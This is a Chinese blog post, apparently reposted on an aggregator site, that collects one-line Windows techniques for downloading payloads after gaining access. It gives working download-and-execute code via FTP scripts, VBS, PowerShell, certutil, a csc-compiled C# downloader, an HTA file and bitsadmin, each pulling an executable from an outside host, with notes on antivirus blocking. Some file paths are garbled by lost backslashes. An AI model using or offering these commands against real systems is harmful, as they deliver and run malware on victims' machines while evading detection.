一句话下载总结(用于后渗透上传payload)

zoukankan html css js c++ java

一句话下载总结(用于后渗透上传payload)
利用ftp来下载payload文件
```
echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt
```
后记:这个我没有实验成功太菜了

利用vbs来下载payload
```
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:	est1.exe",2
```
后记:这个已经利用成功了，网上说可以用script来执行，可能win10上面没有，但是可以直接双击运行，或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload
```
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:	est1.exe');start-process 'C:	est1.exe'
```
后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *
至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存)，360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容
```
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            string receivePath = @"C:	est";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}
```
后记:csc.exe位于C:WindowsMicrosoft.NETFrameworkv2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式：C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:C: es tdownload.exe C: est1.cs
这样1.cs就会被编辑为exe文件，我们运行一下就会把文件下载下来了，360会进行拦截，估计是捕获了下载的时候的流量了，因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件
```
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\test\1.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>
```
后记：直接双击运行既可或者命令行直接执行，360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具，可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C: estupdate1.exe
后记:不支持https/ftp协议，php/python自带的服务器会报错,360会拦截

总结，其实感觉Windows上可以玩的东西比Linux多，使用的也比Linux多，这可能也是红蓝对抗偏向于这边的原因吧
查看全文

相关阅读:
编译原理 —— 正规式、正规集和正则定义
 NFA的确定化
 第三章词法分析与有限自动机
 文法：0型【短语文法】、1型【上下文有关文法】、2型【上下文无关文法】、3型【正规文法】
语法树、短语、直接短语、句柄、素短语、最左素短语
 【第1章编译概述】1.2编译程序的发展
 【第1章编译概述】1.2编译的各个阶段
 【第1章编译概述】1.1 编译程序功能
 【第1章编译概述】1.1 程序设计语言
 【第9章目标代码生成】9.3 简单代码生成器

原文地址：https://www.cnblogs.com/Mikasa-Ackerman/p/yi-ju-hua-xia-zai-zong-jie-yong-yu-hou-shen-tou-sh.html

一句话下载总结(用于后渗透上传payload)

利用ftp来下载payload文件

利用vbs来下载payload

利用Powershell来下载payload

利用certutil下载文件

利用CSC(windows的c#编译器)来下载文件

hta下载文件

利用bitsadmin下载文件

总结，其实感觉Windows上可以玩的东西比Linux多，使用的也比Linux多，这可能也是红蓝对抗偏向于这边的原因吧